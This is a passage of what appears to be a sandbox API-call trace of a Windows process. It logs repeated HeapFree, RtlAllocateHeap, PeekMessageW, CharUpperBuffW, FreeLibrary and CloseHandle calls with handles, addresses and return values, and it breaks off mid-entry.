[0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.349] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.349] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.349] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.349] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0164.349] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0164.350] FreeLibrary (hLibModule=0x74d40000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.350] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0164.350] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.350] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0164.350] CloseHandle (hObject=0x170) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0164.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0164.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0164.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0164.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0164.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.352] CloseHandle (hObject=0x1e8) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0164.417] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0164.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0164.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0164.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.422] PeekMessageW (in: 